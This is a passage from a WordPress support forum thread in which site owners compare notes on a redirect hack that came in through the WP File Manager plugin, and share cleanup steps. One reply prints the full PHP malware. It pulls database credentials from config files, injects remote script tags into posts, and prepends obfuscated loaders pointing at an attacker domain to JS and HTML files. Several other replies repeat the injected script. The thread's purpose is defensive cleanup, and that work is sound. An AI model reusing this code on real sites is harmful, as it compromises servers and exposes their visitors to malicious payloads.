wordfence not really safe my site, now redirected

Viewing 15 replies - 16 through 30 (of 48 total)

  • I found the script that caused all this. This came from Wp-file-manager plugin:

    The code that is harming all this is:

    <?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors', 1);

search_file_js($_SERVER['DOCUMENT_ROOT'] . "/../../../../../../../../", ".js");
die();

function get_var_reg($pat, $text)
{

	if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) {
		return $matches[1][0];
	}

	return "";
}
function search_file_ms($dir, $file_to_search)
{

	$search_array = array();

	$files = scandir($dir);

	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			@search_file_ms($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			@search_file_ms($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false) {

				show_sitenames($path);
			}
		} else if ($value != "." && $value != "..") {

			@search_file_ms($path, $file_to_search);
		}
	}
}
function show_sitenames($file)
{
	$content = @file_get_contents($file);
	if (strpos($content, "DB_NAME") !== false) {

		$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]", $content);
		$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]", $content);
		$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]", $content);
		$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]", $content);

		// Create connection
		$conn = new mysqli($host, $user, $pass);

		// Check connection
		if ($conn->connect_error) {
		} else {

			$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'";
			$result = $conn->query($q);
			if ($result->num_rows > 0) {
				while ($row = $result->fetch_assoc()) {
					$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . "  LIMIT 1 ";
					$result2 = $conn->query($q2);
					if ($result2->num_rows > 0) {
						while ($row2 = $result2->fetch_assoc()) {
							$val = $row2['post_content'];
							if (strpos($val, "scripts.lowerbeforwarden.ml") === true) {
								var_dump($val); exit;
								if (strpos($val, "scripts.lowerbeforwarden.ml") === false) {

									$q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%scripts.lowerbeforwarden.ml%'";
									$conn->query($q3);
									echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"];
								} else {
								}
							}
						}
					} else {
					}
				}
			} else {
			}
			$conn->close();
		}
	}
}

function search_file($dir, $file_to_search)
{

	$files = @scandir($dir);

	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			//@search_file($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			//@search_file($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {

				//make_it($path);
			}
		} else if ($value != "." && $value != "..") {

			//search_file($path, $file_to_search);
		}
	}
}

function search_file_index($dir, $file_to_search)
{

	$files = @scandir($dir);

	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			//search_file_index($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			//search_file_index($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) {

				//make_it_index($path);
			}
		} else if ($value != "." && $value != "..") {

			//search_file_index($path, $file_to_search);
		}
	}
}
function search_file_js($dir, $file_to_search)
{

	$files = @scandir($dir);
	if ($files == false) {

		$dir = substr($dir, 0, -3);
		if (strpos($dir, '../') !== false) {

			//@search_file_js($dir, $file_to_search);
			return;
		}
		if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") {

			//@search_file_js($dir, $file_to_search);
			return;
		}
	}

	foreach ($files as $key => $value) {

		$path = realpath($dir . DIRECTORY_SEPARATOR . $value);

		if (!is_dir($path)) {
			if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) {

				//make_it_js($path);
			}
		} else if ($value != "." && $value != "..") {

			//search_file_js($path, $file_to_search);
		}
	}
}

function make_it_js($f)
{
	$g = file_get_contents($f);

	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
	} else {

		$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
		$g = file_get_contents($f);
		$g = $l2 . $g;
		@system('chmod 777 ' . $f);
		@file_put_contents($f, $g);
		echo "js:" . $f . "\r\n";
	}
}
function make_it_index($f)
{

	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false || strpos($g, 'scripts.lowerbeforwarden.ml') !== false) {
	} else {
		$l2 = "<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>";
		$g = file_get_contents($f);
		$g = $l2 . $g;

		@system('chmod 777 ' . $f);
		@file_put_contents($f, $g);
		echo "in:" . $f . "\r\n";
	}
}

function make_it($f)
{
	$g = file_get_contents($f);
	if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) {
	} else {
		$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
		if (strpos($g, '<head>') !== false) {
			$b = str_replace("<head>", "<head>" . $l2, $g);
			@system('chmod 777 ' . $f);
			@file_put_contents($f, $b);
			echo "hh:" . $f . "\r\n";
		}
		if (strpos($g, '</head>') !== false) {
			$b = str_replace("</head>", $l2 . "</head>", $g);
			@system('chmod 777 ' . $f);
			@file_put_contents($f, $b);
			echo "hh:" . $f . "\r\n";
		}
	}
}

    I was trying to reserve engineer the hack.

    The code attacks js file and index file. It also attacks any file that has <head> on it.

    The first step would be to remove occurance of all these scripts. I used VSCode to remove them by searching for:

    Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    and

    
<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>

    After that run this script on your sql database.

    
UPDATE wp_posts
SET 
    post_content = REPLACE(post_content,
        "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>",
        '')
WHERE
    post_content LIKE '%lowerbeforwarden%';

    If you have w3 cache or any other cache plugin. Remove the cache directory.

    It had infected around 12 plus sites on my server including any other PHP projects that were on the server.

    Hope it helps.

    I have the same problem, is there anybody that can help us?

    Hello allmassim, I can do this using mysql codes.

    I have the same problem with the following code:

    
<script type=’text/javascript’ src=’https://temp.lowerbeforwarden.ml/temp.js?n=nb5′></script><script type=’text/javascript’ src=’https://temp.lowerbeforwarden.ml/temp.js?n=nb5′></script><script type=’text/javascript’ src=’https://temp.lowerbeforwarden.ml/temp.js?n=nb5′></script>

    Can anybody help us? Wordfence was enabled….

    • This reply was modified 4 years, 2 months ago by Yui. Reason: please use CODE button for proper formatting

    Nasty new malware that gets in via WP File Manager. Walkthrough video on how to fix on the following link.

    https://dorset.tech/nasty-new-malware-doing-the-rounds-lowerbeforwarden-ml/

    Hi @jazzmavericks
    That’s right. We blamed Wordfence wrongly. The link you mentioned was a great help. I have many websites on my VPS and just one of them has this issue. The one that has WP File Manager. But they had a security update 5 days ago and they seem to have made a mess! :/

    Thread Starter audiovalve

    (@audiovalve)

    great analysis “safalshrestha”, which helps us all to perhaps solve the problem. I’m just a user and not a professional, all I have is 8 day old backups and access to my back panel. I can’t look in 500 files and search for the malicious code, but I can tell my provider to upload the backup from 1.9., but that won’t be enough – will it?
    What do I have to do to prevent these idiots from coming back in through the back door ?

    what is your instruction ?

    – first: delete WP file manager or install an update – and then ?

    Thread Starter audiovalve

    (@audiovalve)

    Hi @khubaib927,

    my template is missing … regards, Helmut

    @khubaib927 can you please give me a hand with the files and mysqls codes??

    To remove the script from Database any of this 3 may help. You need to identified which. Also replace the prefix with yours

    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5' type='text/javascript'></script>", " "));

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", " "));

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", " "));

    Dear

    My website also appears to be hacked. Weirdly enough, I have several subsites hosted on the same domain name (even clones of the main website) that are (still) unaffected.

    The above solutions did not work for me. I’d love to know a solution that fixes my problem – and maybe a solution to prevent this from happening on my other subsites.

    I hope we find the solution for this one soon, because it’s spooking me out a lot! I can’t quite grasp how this happened.

    Thanks in advance
    Best regards

    My all 3 websites hack on same hosting, same redirect issue, they convert the permissions of folder and files specially .php and .Js files and folder permissions,

    any fast way to fix this ? hacking redirect code replace method ? i change mysql codes where link is showing.. but still not fixed ??

    @khubaib927 please guide us if you can,

    I’ve followed the steps from julioanampa by heart and i’ve found these scripts in all my posts.

    Also i’ve found in my JS a long script Like this:

    Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    My site is normalizing now.

    same problem
    step 1 :- check u r database options file , that has changed to malicious name
    rename it
    step 2:- goto theme header.php check for <!DOCTYPE html> if there any code before <!DOCTYPE html> delete and also check any malicious code in that file and remove safely

    step 3 :- delete mu-plugin folder in file manager plugin section
    step 4:- scan in word-fence remove all infected files
    step 5 :- scan entire cpanel {or u r control panel} to check other domains infected or not in same file manager system

Viewing 15 replies - 16 through 30 (of 48 total)
  • The topic ‘wordfence not really safe my site, now redirected’ is closed to new replies.